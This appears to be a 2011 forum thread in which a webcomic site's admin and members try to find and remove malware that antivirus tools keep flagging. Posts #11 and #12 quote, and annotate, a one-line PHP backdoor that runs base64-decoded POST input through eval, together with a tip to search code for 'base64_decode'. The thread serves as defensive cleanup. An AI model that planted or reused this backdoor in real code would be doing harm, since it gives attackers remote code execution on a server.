IPB

Welcome Guest ( Log In | Register )

 Forum Rules 
> Ongoing fight against hackers
Mata
post Apr 19 2011, 10:33 AM
Post #1


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



In the last couple of hours I've taken more steps to strengthen this site against hackers, but there will always be vulnerabilities that are harder to catch - basically, legions of hackers in poor countries can make money by finding new holes in code, therefore they always will.

If you get a virus/trojan/etc. warning from this or any of my sites please let me know immediately. Give me as many details as possible, either copy and paste text or with a screenshot of the details of the warning.

I will always try my best to keep this place secure, but there's only so much that can be done by myself and the team here. If you're not running any anti-malware, anti-virus, or a firewall then I highly recommend getting at the very least the Windows security software (which is a lot better than it used to be):

http://www.microsoft.com/en-us/security_es...ls/default.aspx

And get your browser vulnerabilities patched with Spybot:

http://www.safer-networking.org/en/index.html

Thanks for your help and patience. If anything comes up then please let me know ASAP!


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
2 Pages V   1 2 >  
Start new topic
Replies (1 - 24)
Moosh
post Apr 19 2011, 10:48 PM
Post #2


I plug directly into my computer
************

Group: Established Members
Posts: 3,643
Joined: 18-November 04
From: Manchester
Member No.: 1,488
Gender: Male



AVG popped these up when Firefox tried to load the RSS feed from your blog.


--------------------
QUOTE (Peter Griffin)
Math, my dear boy, is nothing more than the lesbian sister of biology.
Go to the top of the page
 
+Quote Post
Mata
post Apr 20 2011, 08:14 AM
Post #3


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Mata
post Apr 20 2011, 03:12 PM
Post #4


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



I've had a try at fixing that. Could you see if it's worked please?


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
snooodlysnoosnoo...
post Apr 20 2011, 05:59 PM
Post #5


dream to make believe
************

Group: Established Members
Posts: 2,525
Joined: 12-January 04
From: England
Member No.: 863
Gender: Female



AVG is still throwing up a "Threat was blocked" warning occasionally when I come to the forum, forgot to get a shot of it though... will try and remember next time it comes up!


--------------------
Last.fm
snoo is about as evil as a muffin
Go to the top of the page
 
+Quote Post
Mata
post Apr 20 2011, 09:17 PM
Post #6


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



I got a script hidden in the forum code this afternoon too. It was pretty obscure so was unlikely to be triggered often. Let me know if it happens again please, but hopefully it's fixed.


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Daria
post Apr 21 2011, 10:48 AM
Post #7


Wait for the uprising
************

Group: Established Members
Posts: 3,177
Joined: 7-April 05
From: In a cave in Scotland
Member No.: 1,735
Gender: Female



After realising that there's no where online I'd host a screenshot of the AVG threat, I messaged it to you on fb, Mata.
It was from the search newposts page.


--------------------
We are unraveling our navels so that we may ingest the sun.

DARIA IZ GOOD ON TOAST

TOAST IZ GOOD ON DARIA
Go to the top of the page
 
+Quote Post
Moosh
post Apr 21 2011, 11:05 AM
Post #8


I plug directly into my computer
************

Group: Established Members
Posts: 3,643
Joined: 18-November 04
From: Manchester
Member No.: 1,488
Gender: Male



QUOTE (Mata @ Apr 20 2011, 09:14 AM) *
Oo, interesting one. I'll go check that out, though I've got no idea what it will look like. Thanks!

Yeah, I think that's got it. At least AVG's not objecting anymore.


--------------------
QUOTE (Peter Griffin)
Math, my dear boy, is nothing more than the lesbian sister of biology.
Go to the top of the page
 
+Quote Post
Mata
post Apr 21 2011, 11:19 AM
Post #9


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Daria is still seeing it, it seems.

Can anyone get a consistent reproduction of this problem?

Daria, can you get the error if you refresh your cached files? (I'm hoping that the script I found yesterday might have been the problem and it was lurking in your cache... But I think that's wishful thinking.)


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Moosh
post Apr 21 2011, 02:31 PM
Post #10


I plug directly into my computer
************

Group: Established Members
Posts: 3,643
Joined: 18-November 04
From: Manchester
Member No.: 1,488
Gender: Male



Speak of the devil, different day, different computer and I get:


--------------------
QUOTE (Peter Griffin)
Math, my dear boy, is nothing more than the lesbian sister of biology.
Go to the top of the page
 
+Quote Post
Mata
post Apr 21 2011, 02:57 PM
Post #11


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Righty ho, I've finally managed to locate on nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
CrazyFooIAintGet...
post Apr 22 2011, 06:39 PM
Post #12


Has been kidnapped by gerbils and forced to post on here repeatedly
***********

Group: Established Members
Posts: 1,088
Joined: 18-September 03
From: London
Member No.: 606
Gender: Female



QUOTE (Mata @ Apr 21 2011, 03:57 PM) *
Righty ho, I've finally managed to locate on nasty piece of code hiding in a cache file for the languages. The file was /forums/cache/lang_cache/en/lang_global.php

I'm assuming that this file is only accessed irregularly, so that would explain why Exploit Script Injection (type 1702) was only popping up occasionally.

The simplest method I've found for locating these problems is running a text search through all of the code on my site looking for the line 'base64_decode'. Almost every hack seems to use this to evade basic detection, but I've not seen a benevolent use of it yet, so it's definitely an indicator of shenanigans.

Another tricky one I've found hidden on a couple of files was this:

if (isset($_GET["cookie"])) { echo 'cookie=4'; if (isset($_POST["a9707a3e38"])) @eval(base64_decode($_POST["a9707a3e38"])); exit; }

I think what this was trying to do was email off cookies, probably to steal passwords, but I'm not quite sure how it works and it wasn't in a location that anyone else on here has access to, so it's nothing to be worried about.

So... Let me know if you see anything untoward happening again! I sincerely hope I've got all of this crap this time - it's taken many, many hours! (Of course, I'd rather know if there's still something I've missed!)

Hmm... my guess would be its to hijack your admin session.

CODE
if (isset($_GET["cookie"])) {                        // check if a cookie was sent in the request (i.e. user is logged in)
    echo 'cookie=4';                                 // useless
    if (isset($_POST["a9707a3e38"]))                 // check if some POST variable was sent in the HTTP request. You'd have to be redirected here from a malicious site for this to be true
        @eval(base64_decode($_POST["a9707a3e38"]));  // execute it as PHP code
    exit;                                            // useless
}


--------------------
Kung fu fighting from 25th April 2010
Go to the top of the page
 
+Quote Post
Mata
post Apr 22 2011, 07:27 PM
Post #13


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



We should be good in that regard - the admin sessions are very short on here.

Has anyone had any new problems since yesterday afternoon?


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Mata
post Apr 23 2011, 08:25 PM
Post #14


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.

I've run scans through my whole server for iframe commands and couldn't find this one. I couldn't find any nasty base64_decode commands either, so I don't think it's concealed in there. I've scanned all of my databases for iframe commands and I don't think it's in there either.

Help! Any suggestions to help find it appreciated.


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
SPEAKERfortheLOS...
post Apr 23 2011, 10:22 PM
Post #15


Transdimensional Traveler
************

Group: Established Members
Posts: 1,322
Joined: 20-August 04
From: Somewhere in the Ęther
Member No.: 1,244
Gender: Secret



If you have the funding, try creating another domain like test.matazone.co.uk and recreate the comic.matazone.co.uk site there.

That way, once it is setup to your liking, you can find if the scan is a remnant of the past infection or if there is an underlying issue to be resolved.


--------------------
It is by caffeine alone I set my mind in motion,
It is by the beans of Java that thoughts acquire speed,
The hands acquire shaking, the shaking becomes a warning,
It is by caffeine alone I set my mind in motion.


Jack of all trades, master of none,
though offtimes better than master of one.

Carpe Noctem, pro cras nos necemus
Carpe Diem, pro hodie nos mutiamo

Go to the top of the page
 
+Quote Post
Daria
post Apr 24 2011, 01:46 AM
Post #16


Wait for the uprising
************

Group: Established Members
Posts: 3,177
Joined: 7-April 05
From: In a cave in Scotland
Member No.: 1,735
Gender: Female



I got it again today, twice: once on the Mittens Zombie Game, and once on the search new posts page. Forgot to get a screenshot of either one, I'm afraid :/


On a different note, I went back through the Mr Snaffleburger cartoons today because I was showing them to a friend. I found it interesting, Mata, that they were probably a huge influence on how I thought about corporate advertising and capitalism when I was in my early teens. So, thank you!


--------------------
We are unraveling our navels so that we may ingest the sun.

DARIA IZ GOOD ON TOAST

TOAST IZ GOOD ON DARIA
Go to the top of the page
 
+Quote Post
Mata
post Apr 24 2011, 09:43 AM
Post #17


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



I'd deleted the installation of PHPads and the associated database a couple of weeks ago after suspecting that this was the problem, but it seems that somehow the evocation code was somehow compromised. I've no idea how, because the links pointed to a folder on my site and I know for a fact that the folder doesn't exist any more...

Still, I think that this has probably fixed the issue, so you're all back on watch again please - let me know if you see any trojan warnings again please!

Daria: my work here is done biggrin.gif It was a very deliberate choice at the time to try and make people question corporate messages (in an entertaining way). I'm very chuffed that this was effective and honoured that it may have played a tiny part in making you as awesome as you are.


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Hobbes
post Apr 24 2011, 10:44 AM
Post #18


Advice for the young at heart
************

Group: Moderators
Posts: 2,708
Joined: 26-February 03
From: Essex, UK
Member No.: 33
Gender: Male



QUOTE (Mata @ Apr 23 2011, 09:25 PM) *
Okay, I've found this:

http://sitecheck.sucuri.net/scanner/?scan=....matazone.co.uk

Apparently it's on my comic, but I can't find it bloody anywhere.


Your site has been showing up as clear for me, and I haven't had any alerts from virus or spyware software this time around. I've clicked my way through most of the forum and comic pages to see if anything has flagged up but nothing so far. Could it be browser-specific?
Go to the top of the page
 
+Quote Post
Mata
post Apr 24 2011, 07:39 PM
Post #19


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Possibly, but hopefully I've fixed it!


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Mata
post Apr 25 2011, 09:18 AM
Post #20


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



I've had one report of Kaspersky still being grumpy on my comic. Could people with AVG or Kaspersky clear their cached internet files and refresh the page on my comic please?

I'm really hoping I've got it fixed, but I need to know if it's not. I have never had any warnings with Firefox, Windows Security Essentials, and Spybot blocking script exploits, so I can't see these problems myself. Confirmation one way or another would be appreciated!


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Pixelgoth
post Apr 25 2011, 07:50 PM
Post #21


Flaps and spins on the spot
************

Group: Established Members
Posts: 2,651
Joined: 17-June 03
From: At the end of the road to nowhere.....literally!
Member No.: 390
Gender: Female



Got a blocked threat message but don't know how to paste it here sad.gif


--------------------
Hope confidentally, do valiantly, wait patiently!
Rather light a candle than complain about the dark!
Enjoy what you have and hope for what you lack
Thoughts become things, choose the good ones[/center]
[center]Carpe diem
Go to the top of the page
 
+Quote Post
Mata
post Apr 26 2011, 07:59 AM
Post #22


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Last night (about midnight UK time) I got desperate and overwrote the entire main layout template for my comic and I hope that's solved the problem there, although I would have much rather found the problem so I could identify it more easily in the future.

Pixie: did you get a warning while on my comic or on these forums? If it's on here then that's going to be a lot harder to fix, and I'm going to have to rest in the hands of Mr Fuzzy on that one. If there's anything nasty lurking on the forums (you know, other than SPS*) then I've got no idea how to find it past what I've already tried.

You can use the 'Prt Sc' button to take a screenshot of whatever is on your screen at the time. You can then paste it into MS Paint (or Photoshop preferably) and save the file. You can then attach the file to a message on Facebook.

*(We love you really, SPS).


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Mata
post Apr 29 2011, 11:59 AM
Post #23


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



I've had one report of a trojan still lurking on the forums. Has anyone else seen this? It's the same as before: detected with AVG and suggesting that the problem is 'Script Exploit type 1702'. Once again, I can't find anything untoward in the code.


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post
Moosh
post Apr 30 2011, 07:56 AM
Post #24


I plug directly into my computer
************

Group: Established Members
Posts: 3,643
Joined: 18-November 04
From: Manchester
Member No.: 1,488
Gender: Male



Yeah, I've started getting the same messages as above. Only sporadically though, not every time I come on matazone.co.uk, but they can be set off by the forums, the comic, the blog...


--------------------
QUOTE (Peter Griffin)
Math, my dear boy, is nothing more than the lesbian sister of biology.
Go to the top of the page
 
+Quote Post
Mata
post Apr 30 2011, 12:03 PM
Post #25


'Trouble Down Pit' now online!
***************

Group: Admin
Posts: 10,205
Joined: 22-February 03
From: Southern UK
Member No.: 1
Gender: Male



Rargh!

Okay, please take a screen shot with the 'more details' tab revealed, and note the URL and time please. I've got no idea where to start.

I don't know enough about this to say what it could be, but is it possible that there is something on the server itself, not actually on my pages, that is randomly blipping a trojan warning out to any .php page?


--------------------
Trouble Down Pit: Still updated every Monday and Friday
The Matazone Games blog
The Matazone Shop The Matazone Blog
The Matazone Corset Shop: Snobz corsets at 10% off their recommended price!
Go to the top of the page
 
+Quote Post

2 Pages V   1 2 >
Reply to this topicStart new topic
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

 



Lo-Fi Version Time is now: 18th October 2017 - 09:24 AM
Use these links if you're going to shop at Amazon and a percentage of what you spend goes towards helping this site!